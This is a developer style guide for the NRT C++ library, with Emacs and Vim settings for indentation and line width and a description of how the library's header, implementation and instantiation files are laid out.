If this question (or a similar one) is answered twice in this section, please click here to let us know.
Warnings
- Don't do anything critical with EC2 until you know exactly what you are doing and have gained enough experience with it. The information provided is a recap from Jeff W. (Amazon Web Services), and he deserves most (if not all) of the credit for this HOWTO (that also means, if things go wrong, you can blame him more than wikiHow). Use at own risk. | http://www.wikihow.com/Turn-Your-Ec2-Based-Windows-Server-Into-a-Dc | CC-MAIN-2017-17 | en | refinedweb |
Use Dart 1.9 for native support for async/await/sync/async/yield.**
A prototype (and in progress) implementation of async/await in Dart, via CPS translation.
This transformer is useful for trying async/await with dart2js. The Dart VM natively supports async and await. If you are writing Dart code that runs only in the VM, you do not need this transformer.
Add this to your pubspec.yaml file:
dependencies: async_await: git: transformers: - async_await
Import dart:async in your Dart file:
import 'dart:async';
See also the open issues. | https://chromium.googlesource.com/external/github.com/dart-lang/async_await/ | CC-MAIN-2017-17 | en | refinedweb |
The python 3.3 documentation tells me that direct access to a property descriptor should be possible, although I'm skeptical of its syntax
x.__get__(a)
class MyDescriptor(object):
"""Descriptor"""
def __get__(self, instance, owner):
print "hello"
return 42
class Owner(object):
x = MyDescriptor()
def do_direct_access(self):
self.x.__get__(self)
if __name__ == '__main__':
my_instance = Owner()
print my_instance.x
my_instance.do_direct_access()
Traceback (most recent call last):
File "descriptor_test.py", line 15, in <module>
my_instance.do_direct_access()
File "descriptor_test.py", line 10, in do_direct_access
self.x.__get__(self)
AttributeError: 'int' object has no attribute '__get__'
shell returned 1
By accessing the descriptor on
self you invoked
__get__ already. The value
42 is being returned.
For any attribute access, Python will look to the type of the object (so
type(self) here) to see if there is a descriptor object there (an object with a
.__get__() method, for example), and will then invoke that descriptor.
That's how methods work; a function object is found, which has a
.__get__() method, which is invoked and returns a method object bound to self.
If you wanted to access the descriptor directly, you'd have to bypass this mechanism; access
x in the
__dict__ dictionary of
Owner:
>>> Owner.__dict__['x'] <__main__.MyDescriptor object at 0x100e48e10> >>> Owner.__dict__['x'].__get__(None, Owner) hello 42
This behaviour is documented right above where you saw the
x.__get__(a) direct call:.
The Direct Call scenario in the documentation only applies when you have a direct reference to the descriptor object (not invoked); the
Owner.__dict__['x'] expression is such a reference.
Your code on the other hand, is an example of the Instance Binding scenario:
Instance Binding
If binding to an object instance,
a.xis transformed into the call:
type(a).__dict__['x'].__get__(a, type(a)). | https://codedump.io/share/oDcg0iRLYwfJ/1/descriptors-and-direct-access-python-reference | CC-MAIN-2017-43 | en | refinedweb |
I am trying to grab the version number from a string via python regex...
Given filename: facter-1.6.2.tar.gz
When, inside the loop:
import re
version = re.split('(.*\d\.\d\.\d)',sfile)
print version
Two logical problems:
1) Since you want only the 1.6.2 portion, you don't want to capture the
.* part before the first
\d, so it goes outside the parentheses.
2) Since you only want to match the pattern in question and grab it, using re. split makes no sense. Instead, use
re.match. This will give you a Match object, and you can use its
.group() method to get the actual matched text. "group 0" is the entire matched pattern, "group 1" is what's matched by the stuff inside the first set of parentheses, etc.
>>> re.match('.*(\d\.\d\.\d)', 'factor-1.6.2.tar.gz').group(1) '1.6.2'
Although as the other answer indicates, there's actually no point in matching the
.* part anyway, because we can instead search for the string that consists of only the part we want. This will look for the pattern anywhere within the string (matching expects it to be at the beginning). Since we don't need parentheses to make the pattern work logically, and because we're now going to use the entire matched portion, we no longer have any need for parentheses, either.
>>> re.search('\d\.\d\.\d', 'factor-1.6.2.tar.gz').group(0) '1.6.2' | https://codedump.io/share/smOx3jwPCIlh/1/python-regex-recompile-match-string | CC-MAIN-2017-43 | en | refinedweb |
Urho3D::JSONValue Class Reference
Public Member Functions | Static Public Member Functions | Static Public Attributes | Private Attributes | List of all members
Urho3D::JSONValue Class Reference
JSON value class. More...
#include <Urho3D/Resource/JSONValue.h>
Collaboration diagram for Urho3D::JSONValue:
Detailed Description
JSON value class.
Member Function Documentation
The documentation for this class was generated from the following files:
- Source/Urho3D/Resource/JSONValue.h
- Source/Urho3D/Resource/JSONValue.cpp | https://urho3d.github.io/documentation/HEAD/class_urho3_d_1_1_j_s_o_n_value.html | CC-MAIN-2017-43 | en | refinedweb |
Django (1.5) Modelform is supposed to handle many-to-many fields. In my case, I was editing the Django User model with Django groups. Everything seemed to be working correctly. The correct group associations were automatically showing up in the many-to-many widget. The problem was the new associations were not being saved.
A quick look at the docs revealed a discussion of the problems that can happen with many-to-many when a save is done using commit=False. But I was not doing that.
Turns out the problem was in my multi-select widget. I am using the “Whitelabel” theme from revaxarts.com.It auto-magically replaces clunky widgets with better widgets. When I used a bare-bones HTML template, the many-to-many worked.
When I looked at the cleaned data right before the save command, I noticed that the Groups query set was empty. Adding the following to the form’s clean methods solved the problem:
def clean_groups(self): if 'groups[]' in self.data: group_ids = [int(x) for x in self.data['groups[]']] g = Group.objects.filter(id__in=group_ids) else: g = Group.objects.none() return g | https://snakeycode.wordpress.com/2013/09/24/django-modelform-with-many-to-many/ | CC-MAIN-2017-43 | en | refinedweb |
Vultr Driver Documentation¶
Vultr was built by the same team that created Choopa.com and GameServers.com, has tackled hosting solutions, delivering industry leading performance and reliability while building out one highly available worldwide network.
Read more at:
Instantiating the driver¶
from libcloud.dns.types import Provider from libcloud.dns.providers import get_driver cls = get_driver(Provider.VULTR) driver = cls(key='api_key')
API Docs¶
- class
libcloud.dns.drivers.vultr.
Vult. | https://libcloud.readthedocs.io/en/latest/dns/drivers/vultr.html | CC-MAIN-2017-43 | en | refinedweb |
I need to implement a DLL that will take the parameter passed (SessionNumber) and add it to a web address, and then launch the default browser using that address.
I'm having problems getting it to work correctly.
Currently, I have:
namespace WebsiteLaunch { public class LaunchSite { public LaunchSite(ref string SessionNumber) { string SessionPassed = SessionNumber; string target = "?" + SessionPassed; try { System.Diagnostics.Process.Start(target); SessionNumber = "SUCCESS"; } catch { SessionNumber = "ERROR"; } } } }
The source compiles fine, but doesn't work successfully when called from another program. | https://www.daniweb.com/programming/software-development/threads/341230/dll-to-launch-website | CC-MAIN-2017-43 | en | refinedweb |
Traceback --- error seen when trying to capture and store image using shutil
Hi
I have used the below code to capture and store an Image
img = Screen(
import shutil
shutil.
import os.path
shutil.
And this is the error i get
TypeError ( coercing to Unicode: need string, org.sikuli.
[error] --- Traceback --- error source first line: module ( function ) statement 293: shutil ( move ) File "C:\Sikuli\
Please tell me what to do to remove this erroe
Question information
- Language:
- English Edit question
- Status:
- Solved
- For:
- Sikuli Edit question
- Assignee:
- No assignee Edit question
- Solved:
- 2017-08-11
- Last query:
- 2017-08-11
- Last reply:
- 2017-08-11
Thanks masuo, that solved my question.
try this code
0).capture( 27,170, 963,159) .getFile( )
img = Screen( | https://answers.launchpad.net/sikuli/+question/655742 | CC-MAIN-2017-43 | en | refinedweb |
. So, the patch has to look like what is below. I've decided to use the internal set/clear API, because itallow to ignore the default state of control line (all the troubleswith TIOCM_OUT2/TIOCM_OUT1 on various platforms), so it's definitely awin. I'm not too sure about locking. I guess the spinlock inuart_update_mctrl() is probably good enough. I was tempted to create the same API for setting the speed(baud rate), but that may need to wait for another time. As you can't use IrDA SIR with 2.5.X, would you mind giving alook at the issue ? Feel free to forward as needed to get commentsfrom all the interested parties. Thanks in advance... Have fun... Jean---------------------------------------------------------------diff -u -p linux/include/linux/tty_driver.d0.h linux/include/linux/tty_driver.h--- linux/include/linux/tty_driver.d0.h Tue Apr 8 09:56:21 2003+++ linux/include/linux/tty_driver.h Tue Apr 8 10:09:09 2003@@ -157,6 +157,8 @@ struct tty_driver { int (*chars_in_buffer)(struct tty_struct *tty); int (*ioctl)(struct tty_struct *tty, struct file * file, unsigned int cmd, unsigned long arg);+ int (*modem_ctrl)(struct tty_struct *tty,+ unsigned int set, unsigned int clear); void (*set_termios)(struct tty_struct *tty, struct termios * old); void (*throttle)(struct tty_struct * tty); void (*unthrottle)(struct tty_struct * tty);diff -u -p linux/drivers/serial/core.d0.c linux/drivers/serial/core.c--- linux/drivers/serial/core.d0.c Tue Apr 8 09:51:00 2003+++ linux/drivers/serial/core.c Tue Apr 8 10:15:29 2003@@ -1158,6 +1158,26 @@ uart_ioctl(struct tty_struct *tty, struc return ret; } +/*+ * Called by line disciplines to change the various modem control bits...+ * Line disciplines are implemented within the kernel, and therefore+ * we don't want them to use the ioctl function above.+ * Jean II+ */+static int+uart_modem_ctrl(struct tty_struct *tty, unsigned int set, unsigned int clear)+{+ struct uart_state *state = tty->driver_data;++ /* Set new values, if any */+ /* Locking will be done in there */+ uart_update_mctrl(state->port, set, clear);++ /* Return new value */+ return state->port->ops->get_mctrl(state->port);+}++ static void uart_set_termios(struct tty_struct *tty, struct termios *old_termios) { struct uart_state *state = tty->driver_data;@@ -2150,6 +2170,7 @@ int uart_register_driver(struct uart_dri normal->chars_in_buffer = uart_chars_in_buffer; normal->flush_buffer = uart_flush_buffer; normal->ioctl = uart_ioctl;+ normal->modem_ctrl = uart_modem_ctrl; normal->throttle = uart_throttle; normal->unthrottle = uart_unthrottle; normal->send_xchar = uart_send_xchar;diff -u -p linux/drivers/net/irda/irtty-sir.d0.c linux/drivers/net/irda/irtty-sir.c--- linux/drivers/net/irda/irtty-sir.d0.c Tue Apr 8 09:46:54 2003+++ linux/drivers/net/irda/irtty-sir.c Tue Apr 8 10:34:53 2003@@ -180,32 +180,29 @@ static int irtty_change_speed(struct sir static int irtty_set_dtr_rts(struct sir_dev *dev, int dtr, int rts) { struct sirtty_cb *priv = dev->priv;- int arg = 0;+ int set = 0;+ int clear = 0; ASSERT(priv != NULL, return -1;); ASSERT(priv->magic == IRTTY_MAGIC, return -1;); -#ifdef TIOCM_OUT2 /* Not defined for ARM */- arg = TIOCM_OUT2;-#endif if (rts)- arg |= TIOCM_RTS;+ set |= TIOCM_RTS;+ else+ clear |= TIOCM_RTS; if (dtr)- arg |= TIOCM_DTR;+ set |= TIOCM_DTR;+ else+ clear |= TIOCM_DTR; /*- * The ioctl() function, or actually set_modem_info() in serial.c- * expects a pointer to the argument in user space. This is working- * here because we are always called from the kIrDAd thread which- * has set_fs(KERNEL_DS) permanently set. Therefore copy_from_user()- * is happy with our arg-parameter being local here in kernel space.+ * We can't use ioctl() because it expects a non-null file structure,+ * and we don't have that here.+ * This function is not yet defined for all tty driver, so+ * let's be careful... Jean II */-- lock_kernel();- if (priv->tty->driver.ioctl(priv->tty, NULL, TIOCMSET, (unsigned long) &arg)) { - IRDA_DEBUG(2, "%s(), error doing ioctl!\n", __FUNCTION__);- }- unlock_kernel();+ ASSERT(priv->tty->driver.modem_ctrl != NULL, return -1;);+ priv->tty->driver.modem_ctrl(priv->tty, set, clear); return 0; }diff -u -p linux/drivers/net/irda/sir_kthread.d0.c linux/drivers/net/irda/sir_kthread.c--- linux/drivers/net/irda/sir_kthread.d0.c Mon Apr 7 18:56:28 2003+++ linux/drivers/net/irda/sir_kthread.c Mon Apr 7 18:59:31 2003@@ -151,6 +151,13 @@ static int irda_thread(void *startup) while (irda_rq_queue.thread != NULL) { + /* We use TASK_INTERRUPTIBLE, rather than+ * TASK_UNINTERRUPTIBLE. Andrew Morton made this+ * change ; he told me that it is safe, because "signal+ * blocking is now handled in daemonize()", he added+ * that the problem is that "uninterruptible sleep+ * contributes to load average", making user worry.+ * Jean II */ set_task_state(current, TASK_INTERRUPTIBLE); add_wait_queue(&irda_rq_queue.kick, &wait); if (list_empty(&irda_rq_queue.request_list))-To unsubscribe from this list: send the line "unsubscribe linux-kernel" inthe body of a message to majordomo@vger.kernel.orgMore majordomo info at read the FAQ at | http://lkml.org/lkml/2003/4/8/132 | CC-MAIN-2017-43 | en | refinedweb |
[
]
Andrew Purtell commented on HBASE-2392:
---------------------------------------
I think it's ok for 0.20.4. 3.3.0 only has an issue with nc. Does any HBase user monitor ZK
with nc? I think it unlikely. The four letter stat commands work fine otherwise.
> upgrade to ZooKeeper 3.3.0
> --------------------------
>
> Key: HBASE-2392
> URL:
> Project: Hadoop HBase
> Issue Type: Improvement
> Reporter: Andrew Purtell
> Assignee: Andrew Purtell
> Priority: Minor
> Fix For: 0.20.4, 0.21.0
>
> Attachments: HBASE-2392.patch, HBASE-2392.patch
>
>
> See
> Key features of the 3.3.0 release:
> * observers - non-voting members of the ensemble, scale reads
> * distributed queue recipe implementation (c/java)
> * additional 4letterword/jmx features to support operations
> Changes in contrib:
> * zookeeper-tree: export/import znode namespace
> * zooinspector: gui browser for znode namespace
> * bookkeeper client rewrite, use of netty
> This change can't be done on the 0.20 branch. From the release notes:
> {quote}
> Note: a new feature was added to the version 3.3 client which breaks backward compatibility,
at the wire protocol level, between version 3.3 clients and prior versions of the server (server
versions prior to 3.3).
> {quote}
--
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online. | http://mail-archives.apache.org/mod_mbox/hbase-issues/201004.mbox/%3C1571960859.751271989110869.JavaMail.jira@brutus.apache.org%3E | CC-MAIN-2017-43 | en | refinedweb |
- Author:
- jedie
- Posted:
- August 14, 2008
- Language:
- Python
- Version:
- .96
- forms filefield
- Score:
- 2 (after 6 ratings)
A simple FileField with a addition file extension whitelist. Raised ValidationError("Not allowed filetype!") if a filename contains a extension witch is not in the whitelist.
This will through an AttributeError if required=False. (Due to trying to access data.name when data will be None if required == False).
I rewrote it as
def clean(self, *args, kwargs): data = super(ExtFileField, self).clean(*args, kwargs)
Hopefully I'm correct on this one.
#
s/through/raise an AttributeError exception. :)
Couldn't figure out how to keep djangosnippets from mucking up my code, but hopefully you get the point.
#
This snippet does not account for a field that is not required, and also does not return data so it does not get cleaned correctly.
The superclass will return False for data if the file has been cleared and the field is not required.
Here's a revised clean method for this snippet:
```
```
#
Please login first before commenting. | https://djangosnippets.org/snippets/977/ | CC-MAIN-2017-43 | en | refinedweb |
If you're using React, you've likely come across build tools such as Webpack, Grunt, or Gulp.
These tools are very cool, but at the same time can act as a barrier to entry because of the configuration necessary to use them. There is an easier way to bundle and build our projects: Parcel.js.
I'm going to show you how to set up a project using Parcel for building a React app. It only takes about 5 minutes to get up and running (even less once you've done it a couple of time)!
What is Parcel.js?
According to the Parcel.js website, it is:
... a web application bundler, differentiated by its developer experience. It offers blazing fast performance utilizing multicore processing, and requires zero configuration.
Why is this useful to us?
There's nothing worse than trying to start a project and getting lost in the proverbial weeds when setting up a build tool. Parcel.js eliminates the need for configuration which means we can skip over that part and get right to our project. What's not to love?
It also takes advantage of multicore processing and caching to help speed up build times. No more 30 second waits before we can view our project. Ready to get started and see how easy it is to set up our project? Great!
Setting up our project with Parcel.js
1. Create directory and enter
The first step in any project is creating the directory that will house our files. To do this, navigate to the folder that will contain our project folder and use the line of code below in our terminal.
mkdir parcel-setup && $_
2. Initialize NPM or Yarn
Now that we have our project directory, we should initialize NPM or Yarn to create a package.json file. I will be providing the code for both, but you can just follow the one you prefer. To initialize our project, use the code below:
npm init -y or yarn init -y
The init command initializes the project and the
-y flag goes with the default setup. We could also do this without the
-y flag and manually set up our package.json file.
3. Initialize Git repo and add .gitignore
It's always a good idea to use git in our projects. Git is a version control tool that allows us to take a "snapshot" of code and save it locally or on a site like Github. To add git to our project, we need to initialize it with the following command:
git init
Once we have git added, we should add a .gitignore file. The point of this file is to tell our computer to ignore the files or directories listed when making a commit, or snapshot. The line of code below will create the file and open it for us to edit.
touch .gitignore && open $_
Once our file is open, we need to add the files and folders we don't want added. In this case, it's just going to be our node_modules folder, which is where our dependencies are stored. Our .gitignore file should look like this:
node_modules
4. Create an index.html file
We're about halfway done. Pretty fast, right?
To create our index.html file, we can go back to the terminal and use the following line of code:
touch index.html
We can now open this file in our text editor. We will fill it with the following code. (Hint: If you're using a text editor with Emmet, you can type in
html:5 and hit tab. It should do most of the work for you!)
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http- <title>Parcel Setup</title> </head> <body> <div id="app"></div> <script src="./app.js"></script> </body> </html>
5. Install dependencies
The next step in setting up our project is to install the dependencies for our project. As before, I'm providing code for NPM and Yarn, so just use whichever you are using in your project.
npm install react react-dom parcel babel-preset-env babel-preset-react --save-dev or yarn add react react-dom parcel babel-preset-env babel-preset-react
Once our packages have finished installing we can finish getting our project set up!
6. Add app.js
To actually create our app, we will put it in an app.js file, so can you guess what's next? Yep! We need to create and open the file.
touch app.js && open $_
Inside our app.js file, we will create a React component and use React DOM to render it. If you're unsure about how to create a React component, you should read this article for a quick overview. Below is the code we need to create a React app in our app.js file:
import React from 'react'; import ReactDOM from 'react-dom'; class App extends React.Component { render() { return ( <div> <h1>Hello World!</h1> </div> ) } } ReactDOM.render(<App />, document.getElementById('app'));
Great! The top of our file is importing the dependencies we need for this file. We installed them in step 5. Next, we're creating our App component which will just return an H1 tag with the text "Hello World!". The bottom line renders the app inside the #app element we created in our HTML document in step 4.
7. Create a .babelrc file to tell it how to compile the JavaScript
We're almost done! Since React uses ES6+ JavaScript, we need to set up a .babelrc file to tell it how to compile our code. Babel basically takes the most modern syntax (ES6, ES7, etc) and turns it into code that all browsers can read whether they support ES6+ or not. Pretty cool, right? Let's create our .babelrc file!
touch .babelrc && open $_
Inside of our file, we will put the following code. This is a pretty basic setup, but it will get the job done for our project today.
{ "presets": ["env", "react"] }
Awesome! Just one more step and we're done!
8. Add scripts to our package.json file
The final step before we run our app is to add some script commands to our package.json file. Lets get it open.
open package.json
It should look like this:
{ "name": "parcel-setup", "version": "1.0.0", "main": "index.js", "license": "MIT", "dependencies": { "babel-preset-env": "^1.7.0", "babel-preset-react": "^6.24.1", "parcel": "^1.9.7", "react": "^16.4.2", "react-dom": "^16.4.2" } }
A quick note: The version numbers for your dependencies may be different from mine. At the time of writing, these are the most up-to-date versions.
We're going to add the following code. It says that when we type
npm run start or
yarn start, it should use Parcel to build our application and serve the index.html file.
"scripts": { "start": "parcel index.html" },
Our complete package.json file should look like this:
{ "name": "parcel-setup", "version": "1.0.0", "main": "index.js", "license": "MIT", "scripts": { "start": "parcel index.html" }, "dependencies": { "babel-preset-env": "^1.7.0", "babel-preset-react": "^6.24.1", "parcel": "^1.9.7", "react": "^16.4.2", "react-dom": "^16.4.2" } }
All set up
Our Parcel setup is now complete! To build our application, go back to your terminal and run the command below:
npm run start or yarn start
Your terminal now says
Server running at. Let's open up our browser and go to to see our project.
Conclusion
We've now seen how easy it is to get up and running with Parcel. While tools like Webpack offer more customizations for enterprise level applications, Parcel is great for smaller or new applications as well as prototyping. I highly recommend reaching for Parcel the next time you're starting a new project.
Webpack 4 is fully config-less too. Just have
index.html,
src/index.jsand
package.jsonin your root and it will build the whole project in a breeze, while maintaining compatibility with the whole plugin ecosystem if you need to customize your build.
I’ll have to check that one out! I’ve had good luck with Parcel so my search stopped there. Thanks for the heads up.
I think there are more then just enterprise applications that value customization. I think having an extensible answer for almost every problem is a better reason why you would want to choose webpack. :-)
It always starts with zero config, until it doesn't.
I'm fully a believer right now.
Dropped node-sass into my project and it compiled flawlessly.
Awesome! I’ve been using Parcel for a month or two now and it’s one of the tools I most enjoy using. | https://dev.to/iam_timsmith/parceljs-who-says-bundling-needs-to-be-difficult-4ocm | CC-MAIN-2018-51 | en | refinedweb |
My previous post, Sequelize CRUD 101, covered the very basics of CRUD using the Node ORM, Sequelize. This post will cover two intermediate sets of concepts:
- Querying multiple columns using a query object.
- Creating, updating and deleting multiple records.
You'll benefit from having an SQL database running locally (preferably PostgreSQL), and cloning the repo that goes with this post.
The repo for this post extends that of my Sequelize 101 post, so please refer to my prior post for a walk through of the folder structure and code.
READ: Returning a subset of data
Before getting into complex querying, let's ease into Sequelize with something fairly basic - returning a subset of data.
For example, imagine we have a table of pet information - owner names, ids, addresses, medical history, etc. - but we only want to return names and types from our query. Sequelize has an
attributes option that allows us to declare which columns we want returned.
db.pets.findAll({ attributes: ['name', 'type'], where: { city: 'Los Angeles' } }) .then(pets => { console.log(pets); });
The above query will return all pets with the city 'Los Angeles', but will only return the name and breed or each pet. Supposing there only two pets with 'Los Angeles' as their city, the JSON response would look something like this:
[ { "name": "Max", "type": "cat" }, { "name": "Penelope", "type": "dog" } ]
READ: Querying multiple columns
Basic search functionality is a common feature of APIs, so let's build a search endpoint for our API. The following is an example of query that lets us search for cats in Los Angeles.
The code is simple, here it is:
db.pets.findAll({ where: { city: 'Los Angeles', type: 'cat' } });
If we were searching only one column, e.g. city, we could send a single variable as a payload from the client (this example uses the popular SuperAgent library):
import superagent from 'superagent'; const petCity = 'Los Angeles'; superagent .post('/search') .send({ city: petCity }) .set('Accept', 'application/json') .end(function(err, res){ if (err || !res.ok) { // handle error } else { // handle success } });
As always, our API is built with Express.js. The endpoint to receive our query would look like this:
app.post('/search', (req, res) => { const citySearch = req.body.city; db.pets.findAll({ where: citySearch }) .then(pets => { res.json(pets); }); });
NOTE: Although we are 'getting' data, and the Sequelize method we are using is
findAll, our endpoint is not a GET endpoint. Since we are sending/posting an object from the client, we need to make this endpoint a POST route.
But how do we search multiple columns, e.g. city and type, via our Express API? We'll have to pass an object to Sequelize, and this object will contain our query parameters.
Our client code would look something like this:
import superagent from 'superagent'; const myQuery = { city: 'Los Angeles', type: 'cat' }; superagent .post('/search') .send({ query: myQuery }) .set('Accept', 'application/json') .end(function(err, res){ if (err || !res.ok) { // handle error } else { // handle success } });
Our API endpoint would receive it like so:
app.post('/search', (req, res) => { const multipleSearch = req.body.query; db.pets.findAll({ where: multipleSearch }) .then(pets => { res.json(pets); }); });
CREATE: Bulk creation
Creating multiple records is the most straightforward of the bulk operations, because Sequelize has a
bulkCreate method that accepts an array of objects.
To create two users at once, we need to send our API an array containing two user objects. Here is the object along with the SuperAgent code the client should send the creation endpoint.
const owners = [ { name: "John", role: "user" }, { name: "Sean", role: "user" } ]; superagent .post('/owners/bulk') .send(owners) .set('Accept', 'application/json') .end(function(err, res){ if (err || !res.ok) { // handle error } else { // handle success } });
Here is the endpoint that receives this POST request.
app.post('/owners/bulk', (req, res) => { const ownerList = req.body.owners; db.owners.bulkCreate(ownerList) .then(newOwners => { res.json(newOwners); }) });
Sequelize's
bulkCreate method returns the the newly created users. Here is the JSON response our bulk create request produces:
[ { "id": "1c9fa4db-3499-43ed-8378-47c8f53e900a", "name": "John", "role": "user", "created_at": "2016-10-15T20:23:05.020Z", "updated_at": "2016-10-15T20:23:05.020Z" }, { "id": "b292ff23-9f56-4f15-84ca-68dae355da11", "name": "Sean", "role": "user", "created_at": "2016-10-15T20:23:05.020Z", "updated_at": "2016-10-15T20:23:05.020Z" } ]
UPDATE: Updating multiple records
Updating and deleting multiple records requires more effort on the part of the developer, because Sequelize doesn't have a method specifically for these operations. However, this gives us an opportunity to take advantage of the Javascript promise functionality built into Sequelize.
There are two steps for updating (or deleting) multiple records. First, you query the records. Second, you update the records. The second step is the trickier of the two.
Step 1: We are going to keep this part as simple as possible. For our API, the client will have to send an array of ids corresponding to the records to be updated. We'll use this array to retrieve the records from the database. We will also need an object containing the columns and values for the update.
If we were to change the role of owners John and Sean from 'user' to 'admin', we would send the following code from the client:
const updateObj = { ids: [ "1c9fa4db-3499-43ed-8378-47c8f53e900a", "b292ff23-9f56-4f15-84ca-68dae355da11" ], updates: { role: 'admin' } }; superagent .patch('/owners/bulk') .send(updateObj) .set('Accept', 'application/json') .end(function(err, res){ if (err || !res.ok) { // handle error } else { // handle success } });
Step 2: Since we are updating existing records, we need to create a PATCH route (note line 11 in our SuperAgent code, too). The first piece of logic we need to code is a query that will search for multiple ids. We can do this by using Sequelize's
$in operator (see line 6 below). This operator will read each item in an array.
app.patch('/owners/bulk', (req, res) => { const ids = req.body.ids; const updates = req.body.updates; db.owners.findAll({ where: { id: { $in: ids } } }); // update logic goes here })
In the code above, first we grab the ids and the updates from
req.body. Then we query the owners tables using the
$in operator and the array of ids. This query will return all the owners in the
ids array. Now we need to apply the updates.
To make sure all of our updates are made before we send a response to the client, we need to use
Promise.all(). We've been using promises constantly, as shown by our use of
.then(), but we've been dealing with one promise at a time.
The general form of the logic we have been using is "first do X, then do Y, then do Z". Specifically, the logic has been "query the database, then send back a response" or "query the database, then update the record, then send back the response". In these cases, promises allow us to wait until an operation is complete before moving on to the next step.
In the logic outlined above, we are dealing with one operations at a time; do this, then do that. Now that we are updating multiple records, the logic is different. Rather than "do this, then do that", we need logic of the form "Do many operations, once they are all resolved, then do X". This is where
Promise.all() comes in.
Let's look at the specifics of our implementation.
app.patch('/owners/bulk', (req, res) => { const ids = req.body.ids; const updates = req.body.updates; db.owners.findAll({ where: { id: { $in: ids } } }) .then(owners => { const updatePromises = owners.map(owner => { // the line below creates a new item/promise for // the updatePromises array return owner.updateAttributes(updates); }); return db.Sequelize.Promise.all(updatePromises) }) .then(updatedOwners => { res.json(updatedOwners); }); })
After retrieving the array of owner records from the database, we take the array and use it to create a new array of promises. The Javascript
.map() method takes an array (in this case
owners) and creates an new array from it.
On lines 9 - 13, we take the
owners array and use it as material for creating an array called
updatePromises. The latter contains one
updateAttributes promise for every item in the
owners array. We then pass the newly created
updatePromises array to
Promise.all().
Promise.all() waits for every promise in the
updatePromises array to resolve before moving on to the next operation; in this case, sending a response back to the client.
NOTE: The return statement in
.map() is very important. If you leave it out, you'll produce a new array of
null values. For more on Javascript array methods (which are essential for functional programming), check out this informative post.
DELETE: Deleting multiple records
Deleting multiple records is similar to updating. In fact, it's slightly simpler because we don't need an update object - an array of ids is all that's required.
app.delete('/owners/bulk', (req, res) => { const ids = req.body.ids; db.owners.findAll({ where: { id: { $in: ids } } }) .then(owners => { const deletePromises = owners.map(owner => { return owner.destroy(); }); return db.Sequelize.Promise.all(deletePromises) }) .then(deletedOwners => { res.json(deletedOwners); }); });
On line 8, we see the
.destroy() method at work. If your Sequelize model is set to
paranoid: true, the
.destroy() method will insert a timestamp indicating when the 'soft deletion' happened and the record will no longer be returned in queries. If the model is
paranoid: false, then the record will continue to be returned in queries, but there will be a timestamp indicating when the record was 'deleted'.
The response this route sends is an array of the deleted records, but it will contain the
deleted_at column. Since our model is set to
paranoid: true, these records will not be included in future queries.
[ { "id": "1c9fa4db-3499-43ed-8378-47c8f53e900a", "name": "John", "role": "admin", "created_at": "2016-10-15T20:23:05.020Z", "updated_at": "2016-10-15T20:23:05.020Z", "deleted_at": "2016-10-16T16:16:22.365Z" }, { "id": "b292ff23-9f56-4f15-84ca-68dae355da11", "name": "Sean", "role": "admin", "created_at": "2016-10-15T20:23:05.020Z", "updated_at": "2016-10-15T20:23:05.020Z", "deleted_at": "2016-10-16T16:16:22.365Z" } ]
If you'd like to be notified when I publish new content, you can sign up for my mailing list in the navbar. | https://lorenstewart.me/2016/10/16/sequelize-crud-102/ | CC-MAIN-2018-51 | en | refinedweb |
~/.emacs to set it:
;; set default line wrap len: (setq default-fill-column 120)
~/.emacs to activate):
;; NRT indentation style for C++ and such (defun my-c-mode-common-hook () (local-set-key "\C-h" 'backward-delete-char) ;; this will make sure spaces are used instead of tabs (setq tab-width 4 indent-tabs-mode nil) (setq indent-tabs-mode 'nil) (setq c-basic-offset 2) (c-set-offset 'substatement-open 0) (c-set-offset 'statement-case-open 0) (c-set-offset 'case-label 0) (c-set-offset 'brace-list-open 0) (c-set-offset 'access-label -2) (c-set-offset 'inclass 4) (c-set-offset 'member-init-intro 4) ;; include possible ! as comment start string so that indentation starts after it (setq comment-start-skip "/\\*+!* *\\|//+ *") ;; type C-c C-s or C-c C-o while editing to see what other rules to add here... ) (add-hook 'c-mode-hook 'my-c-mode-common-hook) (add-hook 'c++-mode-hook 'my-c-mode-common-hook) (add-hook 'perl-mode-hook 'my-c-mode-common-hook) (add-hook 'cperl-mode-hook 'my-c-mode-common-hook) (add-hook 'emacs-lisp-mode-hook 'my-c-mode-common-hook) (add-hook 'nroff-mode-hook 'my-c-mode-common-hook) (add-hook 'tcl-mode-hook 'my-c-mode-common-hook) (add-hook 'makefile-mode-hook 'my-c-mode-common-hook)
"-------------Essential NRT Style Compliance Settings------------- " Disable old-school vi compatability set nocompatible " Allow plugins to control our indentation filetype plugin indent on " Set each auto-indent level to equal two spaces set shiftwidth=2 " Let each tab equal two spaces set tabstop=2 " Make sure vim turns all tabs into spaces set expandtab " Make vim indent our code properly set smartindent " Make the maximum line length equal 120 set textwidth=120 "-------------Other cool vim tricks------------- " Use a cool menu when autocompleting filenames, commands, etc... set wildmenu set wildmode=list:longest " Make vim automatically change directories to the directory of any file you open. " This means that when you open a file, then want to open another using :tabe, :o, etc, " you can just type in the relative path from the file you're currently editing. set autochdir " When editing the NRT library, it is a total pain when you are editing a .H file in nrt/include/whatever/whatever, " and then decide you need to edit the source .C file in the nrt/src/whatever/whatever. This little function will " automatically back track in the directory tree for you, find the corresponding .C or .H file, and open it in a new " tab. " To use it, just type ,o (that's a comma, and then a lower-case o). function! OpenOther() if expand("%:e") == "C" exe "tabe" fnameescape(expand("%:p:r:s?src?include?").".H") elseif expand("%:e") == "H" exe "tabe" fnameescape(expand("%:p:r:s?include?src?").".C") endif endfunction nmap ,o :call OpenOther()<CR>
include/nrt/XXX/MyClass.H: only contains declarations and documentation. Absolutely no actual implementation code, except for one: the serialize or load/save functions. The rationale is that we want these functions to be as close as possible to the list of class data members, so we don't forget to update them if we add/remove data members. Also, only declare things of interest to the end user. Everything in this file should be documented using doxygen markup.
include/nrt/XXX/details/MyClassHelpers.H: contains supporting declarations that must be known before the main declarations in MyClass.H can take effect. For example, if the end user will only use a derived class and the base class contains no information that they should care about, declare the base class in details/MyClassHelpers.H and towards the top of MyClass.H include details/MyClassHelpers.H. There is no doxygen markup in this file, and documentation is optional, mainly geared towards advanced programmers.
include/nrt/XXX/details/MyClassImpl.H: contains inlined and template implementation ONLY. There is no doxygen markup in this file, and documentation is optional, mainly geared towards advanced programmers.
src/nrt/XXX/MyClass.C: contains all non-template, non-inline implementation. Documentation is optional.
include/nrt/XXX/details/MyClassInst.H: contains extern template statements. FIXME.
